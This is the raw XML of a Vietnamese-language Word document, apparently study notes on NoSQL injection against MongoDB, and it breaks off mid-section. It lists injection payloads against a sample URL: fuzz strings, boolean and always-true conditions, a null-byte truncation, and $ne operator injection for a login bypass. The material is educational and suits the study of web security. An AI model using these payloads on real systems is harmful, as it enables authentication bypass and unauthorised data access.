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D31E6" w14:textId="77777777" w:rsidR="00224BB6" w:rsidRPr="00BC7C15" w:rsidRDefault="00224BB6" w:rsidP="00224BB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C7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>NoSQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE1DF8D" w14:textId="77777777" w:rsidR="00DA0722" w:rsidRPr="00BC7C15" w:rsidRDefault="00DA0722" w:rsidP="00DA0722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hai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loại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tấn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NoSQL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khác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nhau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A4A0901" w14:textId="4DFA4A05" w:rsidR="00DA0722" w:rsidRPr="00BC7C15" w:rsidRDefault="00DA0722" w:rsidP="00DA0722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 xml:space="preserve">Syntax injection -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phá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vỡ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cú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NoSQL,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tiêm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. Phương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tiêm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SQL. Tuy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NoSQL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cú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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25482A9B" w14:textId="339AB56A" w:rsidR="00DA0722" w:rsidRPr="00BC7C15" w:rsidRDefault="00DA0722" w:rsidP="00DA0722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 xml:space="preserve">Operator injection-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NoSQL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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70714246" w14:textId="0C6D6306" w:rsidR="0074599E" w:rsidRPr="00BC7C15" w:rsidRDefault="0074599E" w:rsidP="0074599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Phát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lỗi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Syntax injection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MongoDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1491ABA3" w14:textId="060ADE5A" w:rsidR="0074599E" w:rsidRPr="00BC7C15" w:rsidRDefault="0074599E" w:rsidP="0074599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sắm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category,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URL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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33725067" w14:textId="77777777" w:rsidR="0074599E" w:rsidRPr="00BC7C15" w:rsidRDefault="0074599E" w:rsidP="0074599E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>https://insecure-website.com/product/lookup?category=fizzy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF37978" w14:textId="3FC5C965" w:rsidR="0074599E" w:rsidRPr="00BC7C15" w:rsidRDefault="0074599E" w:rsidP="0074599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khiến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JSON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product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sưu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MongoDB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43879F46" w14:textId="77777777" w:rsidR="0074599E" w:rsidRPr="00BC7C15" w:rsidRDefault="0074599E" w:rsidP="0074599E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C7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>this.category</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> == 'fizzy'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31493001" w14:textId="21CBFBD7" w:rsidR="0074599E" w:rsidRPr="00BC7C15" w:rsidRDefault="0074599E" w:rsidP="0074599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fuzz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categorytham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MongoDB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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC372F9" w14:textId="77777777" w:rsidR="0074599E" w:rsidRPr="00BC7C15" w:rsidRDefault="0074599E" w:rsidP="0074599E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>'"`{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681EA7C6" w14:textId="77777777" w:rsidR="0074599E" w:rsidRPr="00BC7C15" w:rsidRDefault="0074599E" w:rsidP="0074599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C7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;$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Foo}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1757A7" w14:textId="77777777" w:rsidR="0074599E" w:rsidRPr="00BC7C15" w:rsidRDefault="0074599E" w:rsidP="0074599E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>$Foo \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xYZ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66C6F5E0" w14:textId="298919E9" w:rsidR="0074599E" w:rsidRPr="00BC7C15" w:rsidRDefault="0074599E" w:rsidP="0074599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fuzz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đòn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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D3908D" w14:textId="77777777" w:rsidR="0074599E" w:rsidRPr="00BC7C15" w:rsidRDefault="0074599E" w:rsidP="0074599E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>https://insecure-website.com/product/lookup?category='%22%60%7b%0d%0a%3b%24Foo%7d%0d%0a%24Foo%20%5cxYZ%00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216DF79D" w14:textId="445D6CEE" w:rsidR="00DA0722" w:rsidRPr="00BC7C15" w:rsidRDefault="0074599E" w:rsidP="0074599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trùng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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE18C99" w14:textId="77777777" w:rsidR="00852CA8" w:rsidRPr="00BC7C15" w:rsidRDefault="00852CA8" w:rsidP="00852CA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lastRenderedPageBreak/>
        <w:t>Xác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nhận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hành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vi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điều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kiện</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7813CF2F" w14:textId="17FDE51E" w:rsidR="00852CA8" w:rsidRPr="00BC7C15" w:rsidRDefault="00852CA8" w:rsidP="00852CA8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hổng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cú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NoSQL hay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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F852807" w14:textId="532044D8" w:rsidR="00852CA8" w:rsidRPr="00BC7C15" w:rsidRDefault="00852CA8" w:rsidP="00852CA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' &amp;&amp; 0 &amp;&amp; 'x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' &amp;&amp; 1 &amp;&amp; 'x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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D299F4" w14:textId="050D2BF6" w:rsidR="00D2010E" w:rsidRPr="00BC7C15" w:rsidRDefault="00D2010E" w:rsidP="00852CA8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00BC7C15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http s://insecure-website.com/product/lookup?category=fizzy'+%26%26+0+%26%26+'x</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="725D731A" w14:textId="29268BEC" w:rsidR="00852CA8" w:rsidRPr="00BC7C15" w:rsidRDefault="00852CA8" w:rsidP="00852CA8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>https://insecure-website.com/product/lookup?category=fizzy'+%26%26+1+%26%26+'x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B39044" w14:textId="06158F21" w:rsidR="00224BB6" w:rsidRPr="00BC7C15" w:rsidRDefault="00852CA8" w:rsidP="00852CA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chèn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cú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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C586CB6" w14:textId="77777777" w:rsidR="0013311C" w:rsidRPr="00BC7C15" w:rsidRDefault="0013311C" w:rsidP="0013311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Ghi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đè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điều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kiện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</w:p>
    <w:p w14:paraId="174F7908" w14:textId="77777777" w:rsidR="0013311C" w:rsidRPr="00BC7C15" w:rsidRDefault="0013311C" w:rsidP="0013311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Bây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giờ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đè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hổng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chèn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JavaScript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 '||'1'=='1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE2E592" w14:textId="77777777" w:rsidR="0013311C" w:rsidRPr="00BC7C15" w:rsidRDefault="0013311C" w:rsidP="0013311C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>https://insecure-website.com/product/lookup?category=fizzy%27%7c%7c%27%31%27%3d%3d%27%31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418DFEAF" w14:textId="77777777" w:rsidR="0013311C" w:rsidRPr="00BC7C15" w:rsidRDefault="0013311C" w:rsidP="0013311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MongoDB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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7067F2" w14:textId="77777777" w:rsidR="0013311C" w:rsidRPr="00BC7C15" w:rsidRDefault="0013311C" w:rsidP="0013311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C7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>this.category</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> == 'fizzy'||'1'=='1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1650B018" w14:textId="77777777" w:rsidR="0013311C" w:rsidRPr="00BC7C15" w:rsidRDefault="0013311C" w:rsidP="0013311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chèn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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0162E102" w14:textId="77777777" w:rsidR="000C4054" w:rsidRPr="00BC7C15" w:rsidRDefault="000C4054" w:rsidP="000C40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4568CC" w14:textId="77777777" w:rsidR="000C4054" w:rsidRPr="00BC7C15" w:rsidRDefault="000C4054" w:rsidP="000C40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F784C2" w14:textId="77777777" w:rsidR="000C4054" w:rsidRPr="00BC7C15" w:rsidRDefault="000C4054" w:rsidP="000C40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76198A" w14:textId="4BD232E6" w:rsidR="000C4054" w:rsidRPr="00BC7C15" w:rsidRDefault="000C4054" w:rsidP="000C405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lastRenderedPageBreak/>
        <w:t>Ghi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đè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điều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kiện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Tiếp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tục</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="09D7B444" w14:textId="60BC05A3" w:rsidR="000C4054" w:rsidRPr="00BC7C15" w:rsidRDefault="000C4054" w:rsidP="000C405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null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. MongoDB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null.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sung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MongoDB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qua.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C7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>this.releasedhạn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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sung:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332B5B83" w14:textId="77777777" w:rsidR="000C4054" w:rsidRPr="00BC7C15" w:rsidRDefault="000C4054" w:rsidP="000C405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C7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>this.category</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> == 'fizzy' &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>this.released</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> == 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A62E6C8" w14:textId="5E5E3FA2" w:rsidR="000C4054" w:rsidRPr="00BC7C15" w:rsidRDefault="000C4054" w:rsidP="000C405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C7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>this.released</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> == 1chỉ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lẽ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C7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>this.released</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> == 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8DCB73" w14:textId="054FB84E" w:rsidR="000C4054" w:rsidRPr="00BC7C15" w:rsidRDefault="000C4054" w:rsidP="000C4054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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C2FD74" w14:textId="77777777" w:rsidR="000C4054" w:rsidRPr="00BC7C15" w:rsidRDefault="000C4054" w:rsidP="000C4054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>https://insecure-website.com/product/lookup?category=fizzy'%00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028F9158" w14:textId="2DF75A4B" w:rsidR="000C4054" w:rsidRPr="00BC7C15" w:rsidRDefault="000C4054" w:rsidP="000C405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NoSQL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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C79131" w14:textId="77777777" w:rsidR="000C4054" w:rsidRPr="00BC7C15" w:rsidRDefault="000C4054" w:rsidP="000C405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C7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>this.category</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> == 'fizzy'\u0000' &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>this.released</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> == 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DF01E4" w14:textId="7B19F5CB" w:rsidR="000C4054" w:rsidRPr="00BC7C15" w:rsidRDefault="000C4054" w:rsidP="000C405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MongoDB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null,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1.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fizzydanh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chưa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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E076B9C" w14:textId="3C97438F" w:rsidR="00D2010E" w:rsidRPr="00BC7C15" w:rsidRDefault="00D2010E" w:rsidP="00852CA8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76D26EA0" w14:textId="77777777" w:rsidR="00EE4EF0" w:rsidRPr="00BC7C15" w:rsidRDefault="00EE4EF0" w:rsidP="00852CA8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A8BD570" w14:textId="77777777" w:rsidR="00EE4EF0" w:rsidRPr="00BC7C15" w:rsidRDefault="00EE4EF0" w:rsidP="00852CA8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="673BFA67" w14:textId="77777777" w:rsidR="00EE4EF0" w:rsidRPr="00BC7C15" w:rsidRDefault="00EE4EF0" w:rsidP="00852CA8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0343FFFF" w14:textId="77777777" w:rsidR="00EE4EF0" w:rsidRPr="00BC7C15" w:rsidRDefault="00EE4EF0" w:rsidP="00852CA8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10A4B231" w14:textId="77777777" w:rsidR="00EE4EF0" w:rsidRPr="00BC7C15" w:rsidRDefault="00EE4EF0" w:rsidP="00852CA8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="611D1D93" w14:textId="77777777" w:rsidR="00EE4EF0" w:rsidRPr="00BC7C15" w:rsidRDefault="00EE4EF0" w:rsidP="00852CA8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A9402D7" w14:textId="77777777" w:rsidR="00EE4EF0" w:rsidRPr="00BC7C15" w:rsidRDefault="00EE4EF0" w:rsidP="00852CA8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35318BE2" w14:textId="77777777" w:rsidR="00EE4EF0" w:rsidRPr="00BC7C15" w:rsidRDefault="00EE4EF0" w:rsidP="00852CA8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73F8AE54" w14:textId="77777777" w:rsidR="00EE4EF0" w:rsidRPr="00BC7C15" w:rsidRDefault="00EE4EF0" w:rsidP="00852CA8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EEAA140" w14:textId="77777777" w:rsidR="00EE4EF0" w:rsidRPr="00BC7C15" w:rsidRDefault="00EE4EF0" w:rsidP="00852CA8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50782F0D" w14:textId="2FA2C599" w:rsidR="00EE4EF0" w:rsidRPr="00BC7C15" w:rsidRDefault="00EE4EF0" w:rsidP="00852CA8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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Khi ta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 xml:space="preserve">‘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vào</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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Gift,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syntax,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tỏ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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCCACD8" w14:textId="47790926" w:rsidR="00D2010E" w:rsidRPr="00BC7C15" w:rsidRDefault="00EE4EF0" w:rsidP="00852CA8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60CC4D" wp14:editId="7331212F">
            <wp:extent cx="5943600" cy="3024505"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="736484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843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F9C8" w14:textId="541AA953" w:rsidR="00D3394D" w:rsidRPr="00BC7C15" w:rsidRDefault="00EE4EF0" w:rsidP="00852CA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chèn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r w:rsidR="00D3394D" w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>%27%7c%7c%271%27%3d%3d%271</w:t>
      </w:r>
      <w:r w:rsidR="00D3394D" w:rsidRPr="00BC7C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69459" wp14:editId="75BE1D80">
            <wp:extent cx="5943600" cy="3053080"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="769734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349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A0A1" w14:textId="77777777" w:rsidR="00564494" w:rsidRPr="00BC7C15" w:rsidRDefault="00564494" w:rsidP="005644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7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>NoSQL operator injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9C112B" w14:textId="77777777" w:rsidR="00564494" w:rsidRPr="00BC7C15" w:rsidRDefault="00564494" w:rsidP="0056449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NoSQL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MongoDB bao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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4B4308" w14:textId="77777777" w:rsidR="00564494" w:rsidRPr="00BC7C15" w:rsidRDefault="00564494" w:rsidP="00564494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lastRenderedPageBreak/>
        <w:t xml:space="preserve">$where-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JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5794BF" w14:textId="77777777" w:rsidR="00564494" w:rsidRPr="00BC7C15" w:rsidRDefault="00564494" w:rsidP="00564494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 xml:space="preserve">$ne-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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F2538D" w14:textId="77777777" w:rsidR="00564494" w:rsidRPr="00BC7C15" w:rsidRDefault="00564494" w:rsidP="00564494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 xml:space="preserve">$in-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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607C4534" w14:textId="77777777" w:rsidR="00564494" w:rsidRPr="00BC7C15" w:rsidRDefault="00564494" w:rsidP="00564494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 xml:space="preserve">$regex-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khớp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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A77B4D5" w14:textId="77777777" w:rsidR="00564494" w:rsidRPr="00BC7C15" w:rsidRDefault="00564494" w:rsidP="0056449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chèn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NoSQL.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loạt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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0DE86A" w14:textId="77777777" w:rsidR="00E74791" w:rsidRPr="00BC7C15" w:rsidRDefault="00E74791" w:rsidP="00564494">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27A0002B" w14:textId="77777777" w:rsidR="00E74791" w:rsidRPr="00BC7C15" w:rsidRDefault="00E74791" w:rsidP="00E7479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Gửi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tử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truy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vấn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0798856F" w14:textId="2B111305" w:rsidR="00E74791" w:rsidRPr="00BC7C15" w:rsidRDefault="00E74791" w:rsidP="00E74791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điệp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JSON,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chèn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lồng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: {"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username":"wiener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>"}becomes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 xml:space="preserve"> {"username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":{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"$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ne":"invalid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"}}.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0C197F" w14:textId="4913611C" w:rsidR="00E74791" w:rsidRPr="00BC7C15" w:rsidRDefault="00E74791" w:rsidP="00E7479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URL,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chèn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URL.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: username=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wienertrở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username[$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ne]=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 xml:space="preserve">invalid.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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513AE4EB" w14:textId="77777777" w:rsidR="00E74791" w:rsidRPr="00BC7C15" w:rsidRDefault="00E74791" w:rsidP="00E7479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GETthành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POST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6CF129" w14:textId="77777777" w:rsidR="00E74791" w:rsidRPr="00BC7C15" w:rsidRDefault="00E74791" w:rsidP="00E74791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 xml:space="preserve">Thay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Content-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Typetiêu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application/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json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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6C95B2" w14:textId="77777777" w:rsidR="00E74791" w:rsidRPr="00BC7C15" w:rsidRDefault="00E74791" w:rsidP="00E7479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JSON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dung tin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nhắn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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A08A4E" w14:textId="49B7CBC5" w:rsidR="00E74791" w:rsidRPr="00BC7C15" w:rsidRDefault="00E74791" w:rsidP="00E7479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Chèn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JSON.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AF161B" w14:textId="77777777" w:rsidR="00B37013" w:rsidRPr="00BC7C15" w:rsidRDefault="00B37013" w:rsidP="00E74791">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5029FD9D" w14:textId="77777777" w:rsidR="00EF4CCD" w:rsidRPr="00BC7C15" w:rsidRDefault="00EF4CCD" w:rsidP="00EF4CC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Phát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lệnh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chèn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tử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MongoDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AA8312" w14:textId="0111D1DE" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B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Ứng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bình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thường</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3272F333" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B5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login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request POST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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE8C510" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B58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>{"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username":"wiener","password":"peter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"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DCF956" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B58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 xml:space="preserve">Backend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query MongoDB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32564244" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B5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C7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>db.users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findOne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({ username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: "wiener", password: "peter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" }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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508FB8BF" w14:textId="06EB2702" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B58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Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>➡</w:t>
      </w:r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user wiener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password peter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login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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AF49CF" w14:textId="022DB90A" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B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2. Khi attacker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chèn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query operator</w:t>
      </w:r>
